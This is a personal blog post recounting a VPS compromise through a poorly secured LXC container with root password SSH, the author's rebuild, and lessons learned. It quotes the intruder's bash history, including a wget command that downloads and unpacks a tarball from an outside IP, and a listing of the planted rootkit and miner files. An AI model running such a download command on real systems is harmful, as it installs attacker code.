It was a beautiful morning, and this is what the view looked like from my window.
I got out of bed, switched on my phone, and happened to notice an alert e-mail from Linode telling me my VPS had exceeded my pre-set CPU limit alert for a number of previous hours.
Which was really weird – with the recent CPU upgrades nothing taxes the server, so I popped into a terminal session and immediately spotted an unknown executable running as root
and maxing out one of the cores:
./talk 31.220.1.50 80 30800
That mostly ruined my day.
In retrospect, killing that process outright was a mistake – I should have figured out exactly what it was doing first (used lsof
to figure out what files it had open, checked inside which LXC container it was running – if any – and attached a debugger to it to see if I could figure out anything else).
But I was in the middle of the countryside with nothing but my iPad and iPhone, the kids were fighting over something in the next room, and I hadn’t even had breakfast yet, so I killed it, rooted around in the logs for hints (there was nothing unseemly in denyhosts
, auth.log
etc.), and filed a ticket with Linode alerting them to the breach.
Then I fished around some more and decided to shut the site down.
After breakfast, and since all of my site content and Python source currently1 resides in Dropbox and their online change log showed nothing in the site itself had been tampered with, I decided to rebuild the whole thing on a new Linode – which took around an hour altogether, from building a new host image to setting up new blank containers with the right configurations2.
Timing
Honestly, the timing couldn’t have been worse. I’ve been completely stressed out over the past few weeks over work and family stuff (taking work home, sleeping less than six hours a night and generally freaking out piecemeal, something that hadn’t been happening to me for a few years) and we’d come to the countryside for a family occasion.
Information overload is rampant, so much so that on Friday I decided to temporarily nuke my personal Twitter account (it’s a bad idea to have a public outlet for your feelings sometimes) and disable all the other social/online/community idiocies except Flickr. For good measure, I locked myself out of Google+ and Facebook and removed3 or hid the apps from anything but my iPad, as well as muting pretty much every single mailing-list I’m not required to be in.
Yeah, it’s that bad. I was hoping I could relax and unwind a bit over the weekend, but ended up spending most of Saturday doing overdue e-mail4 and refactoring a key component for a project that’s been lagging behind. This hack completely nuked my Sunday as well.
I considered just leaving the site down, but I actually need it as a reference, so that wasn’t really an option. For instance, I had recently written a quick HOWTO on setting up LXC inside Linode for the vagrant-lxc wiki, and I needed my notes on Vagrant and other stuff.
The Setup
The irritating thing about this hack is that I’m very security-conscious, and that my setup was far from normal:
- There were only 3 open ports - SSH, HTTP and HTTPS/SPDY. There was a firewall, but despite blocking pretty much everything, its main purpose was NAT these to LXC containers running on an internal private network.
- SSH was running with key-only auth (root disabled, obviously) and using
denyhosts
to log (and block) external access attempts. - The three site components (Varnish/SPDY front-end, Python back-end and Dropbox content updater) each run inside a separate LXC container, NATed to the outside via the host.
- I reboot the node every week or so to apply security updates across the board (first the containers, then the host)
So I was stumped as to how they had gotten in, particularly since I’d done the last apt-get dist-upgrade
and reboot this very Thursday. The easy way out would be to blame Linode (lish
and their dashboard don’t have a spotless record, but it’s a palatable trade-off considering their feature set and constant upgrades), but after digging further I figured out they got in via a fourth container – one I’d set up in a hurry a while back.
As far as I could tell, they never broke out of the container (probably never even tried), and everything else on the machine was safe. But doing a full “nuke and pave” was the only way to make absolutely sure.
Mind you, LXC containers are not a guarantee of security in and by themselves (at work we use them extensively with
grsec
tweaked kernels), but in this case they seem to have done the trick well enough.
Deconstructing the hack
The development
container that was attacked was a recent setup (as of last month, actually). It was a fresh base container that I was using for doing package builds and ARM rootfs
images.
My cardinal sin was that it had SSH directly exposed to the outside (on another non-standard, very high port which I’ve only used the once) and password authentication enabled. It was set up in a bit of a hurry, and, as it happens, a stock Ubuntu configuration has SSH root access enabled in sshd_config
.
None of my other, older, containers (which were created months ago) had root
access or password authentication enabled, but cloning any of them would have brought too much baggage along. So I went for a stock image5, and I apparently failed to update it to the latest OpenSSH in my haste to get it running.
Ironically, I soon decided I needed more CPU power and decided to use another machine entirely for what I was doing – but forgot to turn off the container.
And even though it had denyhosts
installed it was accessed by literally hundreds of different IP addresses in the course of the last few days. Eventually one of them got direct root
access somehow (I still don’t know how, since it doesn’t show up in any logs I’ve had time to review).
After rebooting the node and poking around a bit more, I found a rootkit inside that development container under /etc/.kde
containing a Bitcoin miner:
root@tao:/var/lib/lxc/development/rootfs/etc/.kde# ls -al total 764 drwxr-xr-x 2 root root 4096 Jun 1 15:00 . drwxr-xr-x 74 root root 4096 Jun 2 13:14 .. -rwxr-xr-x 1 root root 129 Jun 2 08:39 1 -rwxr-xr-x 1 root root 970 Jan 4 19:09 ago -rw-r--r-- 1 root root 52 Jun 2 13:20 a.seen -rwxr-xr-x 1 root root 309 Apr 30 2009 autorun -rwxr-xr-x 1 root root 8922 Jan 24 2006 b -rwxr-xr-x 1 root root 19557 May 9 2005 b2 -rwxr-xr-x 1 root root 266463 May 9 2005 bang.txt -rwxr-xr-x 1 root root 16875 Nov 12 2004 bleah -rwxr-xr-x 1 root root 43 Jun 1 14:39 cron -rwxr-xr-x 1 root root 152108 Jun 1 2001 crond -rwxr-xr-x 1 root root 10 Jun 1 14:39 dir -rwxr-xr-x 1 root root 8687 Jan 24 2006 f -rwxr-xr-x 1 root root 14679 Nov 3 2005 f4 -rwxr-xr-x 1 root root 81 Aug 16 2006 fwd -rwxr-xr-x 1 root root 15988 Sep 7 2002 j -rwxr-xr-x 1 root root 13850 May 29 2005 j2 -rwxr-xr-x 1 root root 22983 Jul 29 2004 mech.help -rw-r--r-- 1 root root 1064 Jun 2 08:39 mech.levels -rw------- 1 root root 4 Jun 2 13:15 mech.pid -rw-r--r-- 1 root root 350 Jun 2 08:39 mech.session -rwxr-xr-x 1 root root 573 May 29 07:35 mech.set -rwxr-xr-x 1 root root 31 Oct 12 2010 run -rwxr-xr-x 1 root root 15078 Feb 20 2005 s -rwxr-xr-x 1 root root 16776 Nov 19 2009 sl -rwxr-xr-x 1 root root 27 Apr 30 2009 start.sh -rwxr-xr-x 1 root root 15195 Sep 2 2004 std -rwxr-xr-x 1 root root 13399 Sep 25 2010 stealth -rwxr-xr-x 1 root root 8790 Jan 24 2006 stream -rwxr-xr-x 1 root root 15994 Sep 25 2010 talk -rwxr-xr-x 1 root root 7091 Jan 24 2006 tty -rwxr-xr-x 1 root root 163 Jun 1 14:39 update -rwxr-xr-x 1 root root 14841 Jul 22 2005 v2 -rwxr-xr-x 1 root root 16625 Nov 15 2007 x
Of those, bang.txt turned out to be the most interesting, and was the bit I kept for future reference - it contains 15171 IP addresses, which I’ve yet to compare against what logs I have.
A lot more interesting was the root
user’s .bash_history
file, which revealed a possible lead for the attackers:
w apt-get install libc6-i386 -y apt-get update apt-get install libc6-i386 -y cd /etc wget http://174.121.248.131/.../a.tgz; tar zxvf a.tgz ; rm -rf a.tgz; exit
That IP address belongs to ThePlanet.com, and it’s likely to be another compromised host.
And, of course, I’ve compiled a list of recent addresses that were captured in auth.log
around the time those files were created on my filesystem.
But I’m too tired to do anything further about it at this point.
On Linode
To their credit, Linode replied to my ticket promptly but were unable to provide me with any other information (for instance, whether there had been any more suspicious activity in terms of network traffic) and referred me to my own log files and their rebuild instructions. So no dice there.
They did, however, provide a bit of extra info: The IP address I spotted as an argument to talk
belongs to a company called Esecurity registered in Belize, and which ties in with the Bitcoin mining angle.
Like all similar stories, one feels simultaneously grateful and annoyed at a number of things about the hack. Since directing my frustration at the attackers is rather pointless, allow me to count my blessings and utter a couple of random, tangentially related curses:
Praise
- To Panic, without whose Prompt I wouldn’t have been able to do this sanely on an iPad: Thanks, even though screen refreshes are still excruciatingly slow when using
tmux
and there is so much more you could do to improve the app. - To Linode for having a great management tool that let me slice and dice machines and disk images to my heart’s content.
- To the LXC folk for baking in
btrfs
support, making it extremely efficient to run multiple containers out of limited disk space. - To 1Password, which I use to generate and keep all my unique passwords, keys, certificates and what not. The built-in browser was also essential to access the Linode dashboard without hassles.
Random Curses
- To whomever decided that the Logitech Ultra-thin keyboard Cover for iPad didn’t need an
Esc
key: You are a god-forsaken idiot who’s made my life miserable every time I need to usevim
(which is every day). Fortunately I used original VT100 keyboards with US layouts, and know all aboutCtrl+[
and sundry. - Whomever labeled
ufw
as ‘uncomplicated’ without ever trying to set up NAT to an internal interface on it ought to revise that ‘u’ to mean ‘useless’. I very nearly went back to my old “raw”iptables
setup.
Epilogue
All things considered, something good came of this – I had been running Ubuntu 12.04 32-bit and posponing a switch to a 64-bit OS for a while, so this is was as good a trigger as any – I’m now running the latest bleeding-edge 13.04, and it includes a little more security for LXC. I’ll also be rebuilding the whole thing again come 13.10, just in case.
Also, this time around I set up different disk images for the OS, LXC containers (using btrfs
to make it easier to snapshot containers – highly recommended, by the way) and site data, thereby making it easier (I hope) to get rid and/or rollback any compromised components if (when?) it ever happens again.
Because nothing is truly secure in this world, alas. It’s always about compromise.
-
I’m going to move this to CloudPT as soon as the CLI binary is considered stable – I’m currently playing around with an internal build and it’s working absolutely fine, but I don’t want to change too much stuff at once. ↩︎
-
The hardest bit was figuring out how to reproduce a few of the original tweaks to my container setup on an updated version of LXC, but, as with all truly improved technology, I actually had to do less configuration this time around. ↩︎
-
Also, when Google switched on their new inbox last week, they managed to make every single personal e-mail I ever sent since 2009 pop up again on my IMAP Sent folder, which made it impossible to search for a number of common topics in my usual setup. ↩︎
-
I have to say that disabling Google+ Hangouts was particularly satisfying given the way their Chrome extension currently works (or, rather, doesn’t – it’s too shoddy to be truly user-friendly right now). Too bad that it’s becoming almost as popular as Skype for one-on-one video chats. ↩︎
-
This time around I created a blank
base
container, secured it properly and, thanks tobtrfs
, cloned it with copy-on-write to all the others. Of course, if I ever need to set up a different base, I’ll try not to rush things again. ↩︎